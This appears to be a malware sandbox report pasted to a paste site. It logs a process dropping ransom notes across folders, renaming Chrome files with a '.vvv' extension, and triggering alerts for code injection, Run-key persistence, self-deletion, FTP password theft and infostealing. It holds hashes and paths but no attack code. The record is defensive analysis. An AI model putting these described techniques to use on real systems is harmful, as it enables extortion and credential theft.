- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\Install\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778490
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93321
- mode: created
- sequenceNumber: 1703
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778491
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93326
- mode: close
- sequenceNumber: 1704
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778491
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93401
- mode: created
- sequenceNumber: 1705
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778492
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93407
- mode: close
- sequenceNumber: 1706
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778492
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93990
- mode: created
- sequenceNumber: 1707
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778493
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93996
- mode: close
- sequenceNumber: 1708
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778493
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94065
- mode: created
- sequenceNumber: 1709
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778494
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94071
- mode: close
- sequenceNumber: 1710
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778494
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94092
- mode: created
- sequenceNumber: 1711
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\QuickTime\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778495
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94100
- mode: close
- sequenceNumber: 1712
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\QuickTime\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778495
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94138
- mode: created
- sequenceNumber: 1713
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\QuickTime\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778496
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94144
- mode: close
- sequenceNumber: 1714
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\QuickTime\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778496
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94152
- mode: created
- sequenceNumber: 1715
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778497
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94158
- mode: close
- sequenceNumber: 1716
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778497
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94308
- mode: created
- sequenceNumber: 1717
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778498
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94314
- mode: close
- sequenceNumber: 1718
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778498
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94350
- mode: open
- sequenceNumber: 1719
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_100_percent.pak
- filesize: 882175
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976766019
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94655
- mode: close
- sequenceNumber: 1720
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_100_percent.pak
- filesize: 882590
- md5sum: 7f1b248fb538990bbbb28450e8fa7ca4
- sha1sum: f74cd315d3e28bbd47682b66fdd36fb1a51d02f1
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976766019
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94665
- mode: rename
- sequenceNumber: 1721
- filesize: 882590
- md5sum: 7f1b248fb538990bbbb28450e8fa7ca4
- sha1sum: f74cd315d3e28bbd47682b66fdd36fb1a51d02f1
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_100_percent.pak
- new_name: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_100_percent.pak.vvv
- ads:
- fid (ads:): 281474976766019
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94675
- mode: open
- sequenceNumber: 1722
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_touch_100_percent.pak
- filesize: 894948
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976766020
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94883
- mode: close
- sequenceNumber: 1723
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_touch_100_percent.pak
- filesize: 895374
- md5sum: 668b8573303e223c49ca30448ee973e5
- sha1sum: cc64ac5efc40742c77ade73cf3022d56c01f5f01
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976766020
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94896
- mode: rename
- sequenceNumber: 1724
- filesize: 895374
- md5sum: 668b8573303e223c49ca30448ee973e5
- sha1sum: cc64ac5efc40742c77ade73cf3022d56c01f5f01
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_touch_100_percent.pak
- new_name: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_touch_100_percent.pak.vvv
- ads:
- fid (ads:): 281474976766020
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94929
- mode: created
- sequenceNumber: 1725
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\default_apps\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778499
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94935
- mode: close
- sequenceNumber: 1726
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\default_apps\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778499
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94943
- mode: created
- sequenceNumber: 1727
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\default_apps\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778500
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94950
- mode: close
- sequenceNumber: 1728
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\default_apps\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778500
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94959
- mode: created
- sequenceNumber: 1729
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Extensions\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778501
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94965
- mode: close
- sequenceNumber: 1730
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Extensions\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778501
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94984
- mode: created
- sequenceNumber: 1731
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Extensions\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778502
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 94992
- mode: close
- sequenceNumber: 1732
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Extensions\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778502
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95034
- mode: open
- sequenceNumber: 1733
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Installer\chrome.7z
- filesize: 122395900
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930186896
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 99130
- repeat: 200
- sequenceNumber: 1734
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 112851
- repeat: 300
- sequenceNumber: 1735
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 115308
- repeat: 400
- sequenceNumber: 1736
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 115378
- repeat: 500
- sequenceNumber: 1737
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 115448
- repeat: 600
- sequenceNumber: 1738
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 115517
- repeat: 700
- sequenceNumber: 1739
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 115601
- repeat: 800
- sequenceNumber: 1740
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 115674
- repeat: 900
- sequenceNumber: 1741
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 115769
- repeat: 1000
- sequenceNumber: 1742
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- malicious-alert:
- classtype: High Repeated Sleep Calls
- weight: 0
- ruleid: 5202 : High repeated sleep calls ; High repeated number of sleep calls
- msg: High repeated number of sleep calls
- display-msg: High repeated sleep calls
- apicall:
- timestamp: 116439
- repeat: 2000
- sequenceNumber: 1743
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 117118
- repeat: 3000
- sequenceNumber: 1744
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 117785
- repeat: 4000
- sequenceNumber: 1745
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 118455
- repeat: 5000
- sequenceNumber: 1746
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 119137
- repeat: 6000
- sequenceNumber: 1747
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 119817
- repeat: 7000
- sequenceNumber: 1748
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 120592
- repeat: 8000
- sequenceNumber: 1749
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 121248
- repeat: 9000
- sequenceNumber: 1750
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 121912
- repeat: 10000
- sequenceNumber: 1751
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 129464
- repeat: 20000
- sequenceNumber: 1752
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 136119
- repeat: 30000
- sequenceNumber: 1753
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- high_cpu:
- timestamp: 136260
- sequenceNumber: 1754
- total_cpu: 100
- processinfo:
- tainted: true
- pid: 1824
- process_cpu: 100
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 142835
- repeat: 40000
- sequenceNumber: 1755
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 149699
- repeat: 50000
- sequenceNumber: 1756
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 156531
- repeat: 60000
- sequenceNumber: 1757
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- high_cpu:
- timestamp: 156732
- sequenceNumber: 1758
- total_cpu: 100
- processinfo:
- tainted: true
- pid: 1824
- process_cpu: 100
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 163258
- repeat: 70000
- sequenceNumber: 1759
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 170036
- repeat: 80000
- sequenceNumber: 1760
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 176874
- repeat: 90000
- sequenceNumber: 1761
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- high_cpu:
- timestamp: 177219
- sequenceNumber: 1762
- total_cpu: 100
- processinfo:
- tainted: true
- pid: 1824
- process_cpu: 100
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 183835
- repeat: 100000
- sequenceNumber: 1763
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- high_cpu:
- timestamp: 197941
- sequenceNumber: 1764
- total_cpu: 100
- processinfo:
- tainted: true
- pid: 1824
- process_cpu: 100
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- high_cpu:
- timestamp: 219351
- sequenceNumber: 1765
- total_cpu: 100
- processinfo:
- tainted: true
- pid: 1824
- process_cpu: 100
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- end-of-report:
- sequenceNumber: 1766
- malicious-alert:
- classtype: Suspicious-Persistance-Activity
- weight: 0
- ruleid: 2221 : New file in AppData added to Run regkey ; Process drops a file in AppData then adds to Run regkey
- msg: Process drops a file in AppData then adds to Run regkey
- display-msg: New file in AppData added to Run regkey
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10120 : Suspicious Code Injection Activity ; Suspicious Code Injection Activity
- msg: Suspicious Code Injection Activity
- display-msg: Suspicious Code Injection Activity
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10005 : Code Injection Activity ; Code Injection Activity
- msg: Code Injection Activity
- display-msg: Code Injection Activity
- malicious-alert:
- classtype: Generic-Anomalous-Activity
- weight: 0
- ruleid: 8018 : Process Opening explorer ; Process Opening Explorer
- msg: Process Opening Explorer
- display-msg: Process Opening explorer
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10072 : Process Open with Root process deleted ; Process deleting itself
- msg: Process deleting itself
- display-msg: Process Open with Root process deleted
- malicious-alert:
- classtype: Suspicious-Persistance-Activity
- weight: 0
- ruleid: 4411 : Startup services added for file ; Process adding itself (non-DLL) to windows startup areas for file
- msg: Process adding itself (non-DLL) to windows startup areas for file
- display-msg: Startup services added for file
- malicious-alert:
- classtype: Data-Theft-Activity
- weight: 0
- ruleid: 2603 : Firefox FTP password theft ; Process stealing FTP password via registry
- msg: Process stealing FTP password via registry
- display-msg: Firefox FTP password theft
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10045 : Infostealer detected ; Infostealer detected
- msg: Infostealer detected
- display-msg: Infostealer detected
- src:
- vlan: 0
- ip: 172.16.4.61
- host: w016004061.domain.dom
- dst:
- ip: 46.252.197.1
- occurred: 2015-12-04 20:48:49+00
- mode: tap
- alert-url: https://SERVER/event_stream/events_for_bot?ma_id=134
- action: notified
Add Comment
Please, Sign In to add comment